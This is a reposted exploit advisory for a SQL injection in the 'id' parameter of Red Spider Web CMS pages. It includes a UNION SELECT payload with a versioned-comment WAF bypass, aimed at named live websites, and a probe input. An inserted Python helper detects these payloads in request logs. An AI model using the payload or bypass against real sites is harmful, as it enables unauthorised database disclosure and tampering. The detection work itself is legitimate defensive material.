R.s.W - Sql Injection
Red Spider Web CMS has a SQL injection vulnerability affecting the "id" parameter of the project.php, pic.php and gallery.php pages. An attacker can inject special characters to trigger SQL errors and then read database information or manipulate data. 2025-12-14 22:33:22 Author: cxsecurity.com (view original)

*********************************************************
# Exploit Title: SQL Injection – Red Spider Web CMS
# Date: 2025-12-11
# Exploit Author: ITACHI - SELI
# Category: Web Applications
# Tested on: Windows 10 / Kali Linux
# CVE: Not Assigned
*********************************************************

## Summary:
A SQL injection vulnerability was discovered in multiple websites built with the Red Spider Web CMS. The issue exists in the "id" parameter of pages such as project.php, pic.php and gallery.php, where user input is passed to the database without being sanitized.
*********************************************************

### Dom:
https://www.jbshowrah.com/project.php?id=47'/*!50000UNION/**_**/*//*!50000SELECT/**_**/*/ database(),2,3--+
https://www.oarindia.org/gallery.php?id=1
*********************************************************

#### WAF: Mod_Security
##### WAF bypass: /*!50000UNION*/
*********************************************************

### Vulnerability:
The id parameter is passed directly into SQL queries without validation. Adding special characters (e.g., ') triggers SQL errors, which confirms the injection vulnerability.
*********************************************************

Example test input: ?id=-1'

## Impact:
- Database information disclosure
- Possible authentication bypass
- Data manipulation or deletion
- Potential full database compromise
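The advisory's probes hide UNION/SELECT inside MySQL versioned comments (/*!50000...*/) so that a naive WAF pattern misses them. The following detection helper, added here and not part of the original advisory or the CMS, normalises a request's query parameters the way MySQL's lexer would read them (URL decoding, versioned-comment markers dropped, plain comments collapsed) and then flags the markers the advisory describes: a quote breaking out of a numeric id, a UNION SELECT, or a trailing comment. The sample request lines are constructed, with placeholder paths rather than the sites named above.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

def strip_mysql_comments(sql: str) -> str:
    """Reduce a value to what MySQL executes: the body of a versioned
    comment (/*!50000UNION*/) is live SQL, a plain /**/ comment is noise."""
    out, i, n = [], 0, len(sql)
    while i < n:
        if sql.startswith("/*!", i):            # versioned comment: keep the body
            i += 3
            if re.match(r"\d{5}", sql[i:i + 5]):
                i += 5
            out.append(" ")
        elif sql.startswith("/*", i):           # ordinary comment: drop it
            end = sql.find("*/", i + 2)
            i = n if end < 0 else end + 2
            out.append(" ")
        elif sql.startswith("*/", i):           # closer of a versioned comment
            i += 2
            out.append(" ")
        else:
            out.append(sql[i])
            i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip().upper()

# Hallmarks of the probes in the advisory, matched against the normalised value.
MARKERS = {
    "quote after numeric id": re.compile(r"^-?\d+'"),
    "union select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b"),
    "trailing comment": re.compile(r"(--|#)$"),
}

def suspicious_params(request_line: str) -> dict:
    """Map each query parameter that matches a marker to the list of reasons."""
    target = request_line.split()[1] if request_line.startswith(("GET ", "POST ")) else request_line
    findings = {}
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = strip_mysql_comments(unquote_plus(raw))  # second decode catches double encoding
        reasons = [why for why, rx in MARKERS.items() if rx.search(value)]
        if reasons:
            findings[name] = reasons
    return findings

# Constructed access-log request lines (placeholder paths, not the advisory's sites).
SAMPLE_REQUESTS = [
    "GET /project.php?id=47'/*!50000UNION/**_**/*//*!50000SELECT/**_**/*/%20database(),2,3--+ HTTP/1.1",
    "GET /pic.php?id=-1%27 HTTP/1.1",
    "GET /gallery.php?id=1 HTTP/1.1",
    "GET /gallery.php?id=12&page=2 HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(line.split()[1], "->", suspicious_params(line) or "clean")
```

Run over the sample lines, the first two requests are flagged on the id parameter and the last two are reported clean.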

References:

ITACHI – SELI telegram: @ir_itachi_ir Channel:

https://t.me/IR_ITACHI_1_UCHIHA_IR

Channel:

https://t.me/Selii_404

Email: [email protected]



Source: https://cxsecurity.com/issue/WLB-2025120011